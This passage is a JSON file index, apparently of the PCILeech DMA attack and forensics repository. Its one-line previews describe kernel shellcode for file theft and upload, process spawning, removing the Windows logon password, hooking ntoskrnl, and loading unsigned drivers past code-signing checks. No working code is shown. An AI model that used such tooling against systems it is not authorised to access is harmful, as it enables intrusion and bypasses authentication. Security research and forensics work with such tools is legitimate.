"preview": "// uefi_kmd_c.c : stage3 main shellcode.\n// Compatible with UEFI x64.\n//\n// (c) Ulf Frisk, 2017\n// Author: Ulf Frisk, pc"
},
{
"path": "pcileech_shellcode/uefi_textout.c",
"chars": 1901,
"preview": "// uefi_textout.c : prints some text on the screen.\n//\n// (c) Ulf Frisk, 2017\n// Author: Ulf Frisk, pcileech@frizk.net\n/"
},
{
"path": "pcileech_shellcode/uefi_winload_ntos_kmd.asm",
"chars": 1863,
"preview": "; uefi_winload_ntos_kmd.asm : assembly to receive execution from hooked function PsCreateSystemThread at end of executio"
},
{
"path": "pcileech_shellcode/uefi_winload_ntos_kmd_c.c",
"chars": 15381,
"preview": "// uefi_winload_ntos_kmd_c.c : special kmd for use in pre-patched ntoskrnl.exe with VBS enforced code integrity\n//\n// (p"
},
{
"path": "pcileech_shellcode/uefi_winload_ntos_patch.c",
"chars": 59499,
"preview": "// uefi_winload_ntos_patch.c : hooks/patches ntoskrnl.exe!PsCreateSystemThreadEx with evil code.\n// evil code consists o"
},
{
"path": "pcileech_shellcode/wx64_common.c",
"chars": 5364,
"preview": "// wx64_common.c : support functions used by Windows x64 KMDs started by stage3 EXEC.\n// Compatible with Windows x64.\n//"
},
{
"path": "pcileech_shellcode/wx64_common.h",
"chars": 13242,
"preview": "// wx64_common.h : declarations of commonly used shellcode functions\n// Compatible with Windows x64.\n//\n// Author: Ulf F"
},
{
"path": "pcileech_shellcode/wx64_common_a.asm",
"chars": 761,
"preview": "; wx64_common_a.asm : assembly to receive execution from stage3 exec command.\n; Compatible with Windowx 64.\n;\n; (c) Ulf "
},
{
"path": "pcileech_shellcode/wx64_driverinfo.c",
"chars": 4929,
"preview": "// wx64_driverinfo.c : kernel code to list loaded drivers\n// Compatible with Windows x64.\n//\n// (c) Ulf Frisk, 2016\n// A"
},
{
"path": "pcileech_shellcode/wx64_driverload_svc.c",
"chars": 10484,
"preview": "// wx64_driverload_svc.c : kernel code to load both unsigned and signed drivers.\n//\n// (c) Ulf Frisk, 2016\n// Author: Ul"
},
{
"path": "pcileech_shellcode/wx64_driverunload.c",
"chars": 2197,
"preview": "// wx64_driverunload.c : kernel code to unload already loaded drivers.\n// Compatible with Windows x64.\n//\n// (c) Ulf Fri"
},
{
"path": "pcileech_shellcode/wx64_exec_user.asm",
"chars": 1345,
"preview": "; wx64_exec_user.asm : assembly to receive execution from APC in user mode.\n;\n; (c) Ulf Frisk, 2016\n; Author: Ulf Frisk,"
},
{
"path": "pcileech_shellcode/wx64_exec_user_c.c",
"chars": 10235,
"preview": "// wx64_exec_user_c.c : usermode code to be injected into user process to spawn new processes.\n//\n// (c) Ulf Frisk, 2016"
},
{
"path": "pcileech_shellcode/wx64_filepull.c",
"chars": 3346,
"preview": "// wx64_filepull.c : kernel code to pull files from target system.\n// Compatible with Windows x64.\n//\n// (c) Ulf Frisk, "
},
{
"path": "pcileech_shellcode/wx64_filepush.c",
"chars": 3140,
"preview": "// wx64_filepush.c : kernel code to push files to target system.\n// Compatible with Windows x64.\n//\n// (c) Ulf Frisk, 20"
},
{
"path": "pcileech_shellcode/wx64_pageinfo.asm",
"chars": 891,
"preview": "; wx64_pageinfo.asm : shellcode assembly for retrieving various CPU registers.\n;\n; (c) Ulf Frisk, 2016\n; Author: Ulf Fri"
},
{
"path": "pcileech_shellcode/wx64_pagesignature.c",
"chars": 7216,
"preview": "// wx64_pagesignature.c : kernel code to create a page signature from system module / driver.\n//\n// (c) Ulf Frisk, 2016\n"
},
{
"path": "pcileech_shellcode/wx64_psblue.asm",
"chars": 1123,
"preview": "; wx64_psblue.asm : shellcode assembly to just bluescreen the computer due to invalid opcodes\n;\n; (c) Ulf Frisk, 2016\n; "
},
{
"path": "pcileech_shellcode/wx64_pscreate.c",
"chars": 33096,
"preview": "// wx64_pscreate.c : create/spawn new user mode processes.\n// Compatible with Windows x64.\n//\n// (c) Ulf Frisk, 2016\n// "
},
{
"path": "pcileech_shellcode/wx64_pskill.c",
"chars": 3387,
"preview": "// wx64_pskill.c : kernel code to terminate running processes.\n// Compatible with Windows x64.\n//\n// (c) Ulf Frisk, 2016"
},
{
"path": "pcileech_shellcode/wx64_pslist.c",
"chars": 4913,
"preview": "// wx64_pslist.c : kernel code to list running processes (name and PID).\n// Compatible with Windows x64.\n//\n// (c) Ulf F"
},
{
"path": "pcileech_shellcode/wx64_stage1.asm",
"chars": 657,
"preview": "; wx64_stage1.asm : assembly to redirect hook to larger code section.\n;\n; (c) Ulf Frisk, 2016\n; Author: Ulf Frisk, pcile"
},
{
"path": "pcileech_shellcode/wx64_stage2.asm",
"chars": 6606,
"preview": "; wx64_stage2.asm : assembly to receive execution from stage1 shellcode.\n;\n; (c) Ulf Frisk, 2016\n; Author: Ulf Frisk, pc"
},
{
"path": "pcileech_shellcode/wx64_stage23_vmm.asm",
"chars": 4646,
"preview": "; wx64_stage23_vmm.asm : assembly to receive execution from initial hook\n; based on the memory process file system assis"
},
{
"path": "pcileech_shellcode/wx64_stage23_vmm3.asm",
"chars": 4393,
"preview": "; wx64_stage23_vmm3.asm : assembly for the WIN10_X64_3 KMD inject.\n;\n; (c) Ulf Frisk, 2020\n; Author: Ulf Frisk, pcileech"
},
{
"path": "pcileech_shellcode/wx64_stage2_hal.asm",
"chars": 7547,
"preview": "; wx64_stage2.asm : assembly modified for the hal.dll heap injection technique.\n;\n; (c) Ulf Frisk, 2016, 2017\n; Author: "
},
{
"path": "pcileech_shellcode/wx64_stage3.asm",
"chars": 791,
"preview": "; wx64_stage3.asm : assembly to receive execution from stage2 shellcode.\n;\n; (c) Ulf Frisk, 2016\n; Author: Ulf Frisk, pc"
},
{
"path": "pcileech_shellcode/wx64_stage3_c.c",
"chars": 11745,
"preview": "// wx64_stage3_c.c : stage3 main shellcode.\n//\n// (c) Ulf Frisk, 2016, 2017\n// Author: Ulf Frisk, pcileech@frizk.net\n//\n"
},
{
"path": "pcileech_shellcode/wx64_stage3_pre.asm",
"chars": 794,
"preview": "; wx64_stage3_pre.asm : assembly wait loop to wait for continue when executable code exists after\n;\n; (c) Ulf Frisk, 201"
},
{
"path": "pcileech_shellcode/wx64_umd_exec.asm",
"chars": 1502,
"preview": "; wx64_umd_exec.asm : assembly to receive execution from initial hook in user-mode shellcode (umd).\n;\n; (c) Ulf Frisk, 2"
},
{
"path": "pcileech_shellcode/wx64_umd_exec_c.c",
"chars": 9417,
"preview": "// wx64_umd_exec_c.c : usermode 'umd' shellcode for PCILeech for starting and\n// and executing a pro"
},
{
"path": "pcileech_shellcode/wx64_unlock.c",
"chars": 19892,
"preview": "// wx64_unlock.c : kernel code to remove the password requirement when logging on to Windows.\n//\n// (c) Ulf Frisk, 2016-"
},
{
"path": "pcileech_shellcode/wx64_vfs.c",
"chars": 9343,
"preview": "// wx64_vfs.c : kernel code to support the PCILeech file system.\n// Compatible with Windows x64.\n//\n// (c) Ulf Frisk, 20"
},
{
"path": "readme.md",
"chars": 20313,
"preview": "PCILeech Summary:\n=================\nPCILeech uses PCIe hardware devices to read and write target system memory. This is "
},
{
"path": "usb3380.md",
"chars": 2780,
"preview": "USB3380 Hardware:\n=================\nPCILeech uses PCIe hardware devices to read and write from the target system memory."
},
{
"path": "usb3380_flash/linux/Makefile",
"chars": 164,
"preview": "obj-m += pcileech_flash.o\n\nall:\n\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules\n\nclean:\n\tmake -C /lib/mod"
},
{
"path": "usb3380_flash/linux/pcileech_flash.c",
"chars": 7528,
"preview": "// pcileech_flash.c : Linux kernel module to flash the USB3380 into a PCILeech device.\n//\n// (c) Ulf Frisk, 2016. 2017\n/"
},
{
"path": "usb3380_flash/linux/readme.md",
"chars": 1752,
"preview": "Flashing Hardware in Linux:\n===============================\nIn order to turn the USB3380 development board into a PCILee"
},
{
"path": "usb3380_flash/linux/readme_flash.txt",
"chars": 75,
"preview": "Please consult the documentation in pcileech_flash.c for more information.\n"
},
{
"path": "usb3380_flash/windows/USB3380Flash/USB3380Flash.c",
"chars": 6583,
"preview": "// installer.c : implementation of the PCILeech UMDF2 flash driver.\n//\n// (c) Ulf Frisk, 2016, 2017\n// Author: Ulf Frisk"
},
{
"path": "usb3380_flash/windows/USB3380Flash/USB3380Flash.h",
"chars": 207,
"preview": "// USB3380Flash.h : header for PCILeech UMDF2 flash driver.\n//\n// Author: Ulf Frisk, pcileech@frizk.net\n//\n#include <win"
},
{
"path": "usb3380_flash/windows/USB3380Flash/USB3380Flash.user",
"chars": 140,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"14.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "usb3380_flash/windows/USB3380Flash/USB3380Flash.vcxproj",
"chars": 6037,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"12.0\" xmlns=\"http://schemas.micros"
},
{
"path": "usb3380_flash/windows/USB3380Flash/USB3380Flash.vcxproj.filters",
"chars": 1355,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
},
{
"path": "usb3380_flash/windows/USB3380Flash/USB3380Flash.vcxproj.user",
"chars": 160,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "usb3380_flash/windows/USB3380Flash_Installer/USB3380Flash_Installer.vcxproj",
"chars": 8397,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"15.0\" xmlns=\"http://schemas.micros"
},
{
"path": "usb3380_flash/windows/USB3380Flash_Installer/USB3380Flash_Installer.vcxproj.filters",
"chars": 936,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
},
{
"path": "usb3380_flash/windows/USB3380Flash_Installer/USB3380Flash_Installer.vcxproj.user",
"chars": 160,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"14.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "usb3380_flash/windows/USB3380Flash_Installer/installer.c",
"chars": 10228,
"preview": "// installer.c : flash driver installation program.\n// required to get around windows code signing requirement when impo"
}
]